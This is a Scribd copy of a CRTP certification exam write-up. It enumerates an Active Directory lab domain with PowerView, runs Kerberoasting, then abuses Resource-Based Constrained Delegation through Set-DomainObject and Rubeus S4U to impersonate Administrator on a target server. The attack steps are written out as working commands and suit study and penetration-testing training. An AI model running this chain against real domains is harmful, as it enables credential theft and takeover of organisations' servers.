Scribd
Upload
4K views4 pages

CRTP Report Phase1 Phase2 English

The CRTP Exam Report details the process of exploiting Resource-Based Constrained Delegation (RBCD) in an Active Directory environment. Phase 1 involves extensive enumeration of domain users, computers, and admin groups using PowerView, while Phase 2 outlines the steps taken to exploit RBCD to impersonate a Domain Admin and gain access to a target server. The report concludes that the objectives were successfully achieved, resulting in full control over the target server.

Uploaded by

SIELE SORI
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
4K views4 pages

CRTP Report Phase1 Phase2 English

The CRTP Exam Report details the process of exploiting Resource-Based Constrained Delegation (RBCD) in an Active Directory environment. Phase 1 involves extensive enumeration of domain users, computers, and admin groups using PowerView, while Phase 2 outlines the steps taken to exploit RBCD to impersonate a Domain Admin and gain access to a target server. The report concludes that the objectives were successfully achieved, resulting in full control over the target server.

Uploaded by

SIELE SORI
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

CRTP Exam Report – RBCD Exploitation

Phase 1 – Environment Enumeration


The objective of this phase is to gather as much information as possible about the Active
Directory environment using PowerView and other reconnaissance tools.

1.1. Enumerate Domain Users

Command: Get-DomainUser | select samaccountname

📷 Screenshot: List of discovered domain users.

1.2. Enumerate Domain Computers

Command: Get-DomainComputer | select dnshostname

📷 Screenshot: List of discovered machines in the domain.

1.3. Enumerate Domain Admins

Command: Get-DomainGroupMember -Identity 'Domain Admins'

📷 Screenshot: Members of the Domain Admins group.

1.4. Enumerate Enterprise Admins

Command: Get-DomainGroupMember -Identity 'Enterprise Admins' -


Domain finance.corp

📷 Screenshot: Members of the Enterprise Admins group.

1.5. Enumerate Users with SPN (Kerberoastable)

Command: Get-DomainUser -SPN | select samaccountname,


serviceprincipalname

📷 Screenshot: Kerberoastable accounts.

1.6. Run Kerberoasting

Command: Invoke-Kerberoast
📷 Screenshot: Extracted TGS hash for offline cracking.

1.7. Enumerate Delegation and ACLs

Command: Find-InterestingDomainAcl -Verbose

📷 Screenshot: ACLs showing permissions on computers and users.

1.8. List Computers TrustedToAuthForDelegation

Command: Get-DomainComputer -TrustedToAuth

📷 Screenshot: Computers configured for Unconstrained Delegation.

1.9. Find Local Admin Access

Command: Find-LocalAdminAccess -Verbose

📷 Screenshot: Accessible hosts where local admin access was found.


Phase 2 – RBCD (Resource-Based Constrained Delegation) Exploitation
The objective is to exploit RBCD to impersonate a Domain Admin and access a high-
privilege target system.

2.1. Prerequisites Recap


Item Details

Initial account studentuser

Created machine account RBCDComputer$

Initial foothold STUDVM.tech.finance.corp

Target server mgmtsrv.tech.finance.corp

Delegation allowed STUDVM → mgmtsrv

RBCD rights WriteProperty on RBCDComputer by


studentuser

2.2. RBCD Exploitation Steps

➤ Get SID of RBCDComputer

$ComputerSid = Get-DomainComputer RBCDComputer | Select-


Object -ExpandProperty objectsid

📷 Screenshot: SID output

➤ Create Security Descriptor (SD)

$SD = New-Object Security.AccessControl.RawSecurityDescriptor


"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

📷 Screenshot: Binary descriptor created

➤ Set msds-AllowedToActOnBehalfOfOtherIdentity

Set-DomainObject -Identity mgmtsrv -Set @{'msds-


allowedtoactonbehalfofotheridentity'=$SDBytes}

📷 Screenshot: Result of Set-DomainObject


➤ Verify Tickets

klist

📷 Screenshot: Ticket for cifs/mgmtsrv.tech.finance.corp shown

➤ Use Rubeus to extract TGT

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args


'tgtdeleg'

📷 Screenshot: base64(ticket.kirbi) output

➤ Perform S4U2Self + S4U2Proxy attack with Rubeus

Rubeus.exe s4u /user:RBCDComputer$ /rc4:<NTLM>


/impersonateuser:Administrator
/msdsspn:cifs/mgmtsrv.tech.finance.corp /domain:tech.finance.corp
/dc:tech-dc.tech.finance.corp /ptt

📷 Screenshot: Success of ticket injection and impersonation

➤ Access mgmtsrv as Administrator

winrs -r:mgmtsrv.tech.finance.corp cmd

📷 Screenshot: whoami returns Administrator@mgmtsrv

Conclusion
Through detailed enumeration and exploitation of misconfigured delegation rights, the
exam objective was achieved:
- Initial enumeration using PowerView helped identify SPNs, trust relationships, and
delegation settings.
- Exploitation of Resource-Based Constrained Delegation allowed impersonation of a
Domain Admin.
- Full control over the target server 'mgmtsrv.tech.finance.corp' was obtained.

You might also like